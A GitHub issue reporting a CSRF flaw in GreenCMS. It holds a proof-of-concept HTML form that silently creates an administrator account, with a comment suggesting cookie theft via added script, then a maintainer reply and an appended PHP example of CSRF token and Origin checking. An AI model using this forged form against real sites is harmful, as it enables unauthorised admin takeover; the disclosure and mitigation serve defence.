
GreenCMS has a CSRF vulnerability that allows adding an administrator account #109

anquanquantao opened this Issue Jun 1, 2018 · 2 comments



anquanquantao commented Jun 1, 2018


```html
<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
        <form action="" method="POST" id="transfer" name="transfer">
        <input type="hidden" name="user_id0" value="1">
        <input type="hidden" name="user_login" value="test1">  <!-- A JS script could be added here to retrieve cookies (CSRF + XSS) -->
        <input type="hidden" name="password" value="test1">
        <input type="hidden" name="rpassword" value="test1">
        <input type="hidden" name="user_nicename" value="123">
        <input type="hidden" name="user_email" value="">
        <input type="hidden" name="user_url" value="">
        <input type="hidden" name="user_intro" value="test">
        <input type="hidden" name="user_status" value="1">
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">Add administrator</button>
        </form>
</html>
```


TimothyZhang023 commented Jun 1, 2018

The `?m=admin&c=access&a=adduserhandle` permission can only be set and executed by an administrator. Otherwise nothing is written to the database.



anquanquantao commented Jun 1, 2018


TimothyZhang023 added the bug label Jun 1, 2018
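A server-side check that would reject the cross-site form post reported in this issue, as an added example in plain PHP (not GreenCMS code and not written by either participant). A forged POST arrives with the logged-in administrator's session cookie, so the handler needs a per-session token the other site cannot read. The function names, the `csrf_token` field and `https://cms.example` are assumptions.

```php
<?php
// Added example in plain PHP; not GreenCMS code. Function names, the
// csrf_token field and https://cms.example are assumptions.

// One random token per session; the real add-user form embeds it as a hidden field.
function csrf_issue_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Accept a state-changing POST only if it carries the session's token and,
// when the browser sent an Origin header, that origin is the site's own.
function csrf_request_is_valid(array $post, array $server, array $session, string $ownOrigin): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || $expected === '' || !is_string($supplied)) {
        return false;
    }
    if (!hash_equals($expected, $supplied)) {   // constant-time comparison
        return false;
    }
    $origin = $server['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $ownOrigin;
}

// Constructed sample data: an administrator's session and three requests.
$session = [];
$token   = csrf_issue_token($session);
$own     = 'https://cms.example';
$fields  = ['user_login' => 'test1', 'password' => 'test1', 'role_id' => '1'];

$cases = [
    'cross-site form, no token'        => [$fields, ['HTTP_ORIGIN' => 'https://other.example']],
    'valid token, foreign Origin'      => [$fields + ['csrf_token' => $token], ['HTTP_ORIGIN' => 'https://other.example']],
    'admin form, token and own Origin' => [$fields + ['csrf_token' => $token], ['HTTP_ORIGIN' => $own]],
];

foreach ($cases as $label => [$post, $server]) {
    $verdict = csrf_request_is_valid($post, $server, $session, $own) ? 'accepted' : 'rejected';
    echo str_pad($label, 36), $verdict, PHP_EOL;
}
```

In a real handler the three arrays are `$_POST`, `$_SERVER` and `$_SESSION`, and the check runs before any database write.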
